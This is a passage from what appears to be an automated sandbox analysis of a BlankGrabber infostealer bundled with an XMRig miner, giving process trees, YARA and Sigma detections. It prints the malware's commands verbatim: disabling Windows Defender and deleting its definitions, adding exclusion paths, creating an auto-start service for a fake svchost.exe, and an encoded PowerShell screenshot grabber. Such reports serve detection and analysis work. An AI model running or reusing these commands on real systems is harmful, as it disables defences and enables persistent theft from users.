AHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
            • csc.exe (PID: 3004 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cmd.exe (PID: 1076 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tree.com (PID: 7004 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
        • cmd.exe (PID: 7624 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 332 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tree.com (PID: 7984 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
        • cmd.exe (PID: 3612 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • Conhost.exe (PID: 1068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6024 cmdline: C:\ProgramData\Microsoft\svchost.exe MD5: C289921058A4B38BDBD1373A0CBB757D)
    • powershell.exe (PID: 8008 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\_MEI54322\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      SourceRuleDescriptionAuthorStrings
      00000005.00000003.1724535496.000002B9B96E7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000004.00000003.1710226799.0000021148F04000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000004.00000003.1710226799.0000021148F02000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000005.00000002.2085800430.000002B9B9480000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              00000005.00000002.2085800430.000002B9B9480000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 4 entries

                Change of critical system settings

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\instals.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\instals.exe, ParentProcessId: 3716, ParentProcessName: instals.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 3288, ProcessName: powercfg.exe

                System Summary

                barindex
                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\instals.exe, ProcessId: 3716, TargetFilename: C:\ProgramData\Microsoft\svchost.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\instals.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\instals.exe, ParentProcessId: 3716, ParentProcessName: instals.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 1136, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Built.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Built.exe, ParentProcessId: 1420, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 1068, ProcessName: cmd.exe
                Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\ProgramData\Microsoft\svchost.exe, CommandLine: C:\ProgramData\Microsoft\svchost.exe, CommandLine|base64offset|contains: , Image: C:\ProgramData\Microsoft\svchost.exe, NewProcessName: C:\ProgramData\Microsoft\svchost.exe, OriginalFileName: C:\ProgramData\Microsoft\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\ProgramData\Microsoft\svchost.exe, ProcessId: 6024, ProcessName: svchost.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\sc.exe create "NPYIAYNC" binpath= "C:\ProgramData\Microsoft\svchost.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "NPYIAYNC" binpath= "C:\ProgramData\Microsoft\svchost.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\instals.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\instals.exe, ParentProcessId: 3716, ParentProcessName: instals.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "NPYIAYNC" binpath= "C:\ProgramData\Microsoft\svchost.exe" start= "auto", ProcessId: 6164, ProcessName: sc.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe', ProcessId: 3068, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\ProgramData\Microsoft\svchost.exe, CommandLine: C:\ProgramData\Microsoft\svchost.exe, CommandLine|base64offset|contains: , Image: C:\ProgramData\Microsoft\svchost.exe, NewProcessName: C:\ProgramData\Microsoft\svchost.exe, OriginalFileName: C:\ProgramData\Microsoft\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\ProgramData\Microsoft\svchost.exe, ProcessId: 6024, ProcessName: svchost.exe
                Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIA